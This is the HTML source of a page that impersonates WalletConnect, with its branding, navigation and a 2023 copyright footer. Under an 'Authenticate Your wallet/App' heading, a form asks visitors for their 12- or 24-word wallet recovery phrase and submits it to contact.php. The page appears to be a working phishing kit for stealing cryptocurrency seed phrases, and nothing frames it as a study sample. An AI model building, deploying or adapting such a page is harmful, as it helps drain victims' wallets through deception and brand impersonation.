<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta name="author" content="stormtech">
	<title>walletconnect</title>

	<link rel="stylesheet" type="text/css" href="stylesheet2.css">
</head>
<body>

	<header class="header-content">
		<nav class="nav-content">
			<div class="nav-logo">
			<img src="logo.png" class="img-text">
		<h2 class="logo-header"> WALLET CONNECT</h2> </div>

		<div class="nav-items">
			<a href="walletconnect.html" class="item-1">About</a>
			<a href="#" class="item-2">Docs</a>
			<a href="#article-roll" class="item-2">Apps</a>
			<a href="walletconnect.html" class="item-2">Wallets</a>
		</div></nav>

<div class="img">
		<img src="ggj.jpg" class="img-div"></div>

	<div class="button">
		<h3 class="folder-button"> Authenticate Your wallet/App</h3></div>

	</header>
<section class="sec">
	<form action="contact.php">
	<input type="phrase" name="pwd" id="pwd" placeholder="Input wallet phrase"><br>
	<p class="input-p">Typically 12 (sometimes 24) words separated by single spaces </p>
	<input type="submit" value="Import" class="submit-sec">
	</form>
</section>

<footer class="footer">
	<span>@ 2023 WalletConnect.  All rights reserved.</span>
</footer>


</body>


</html>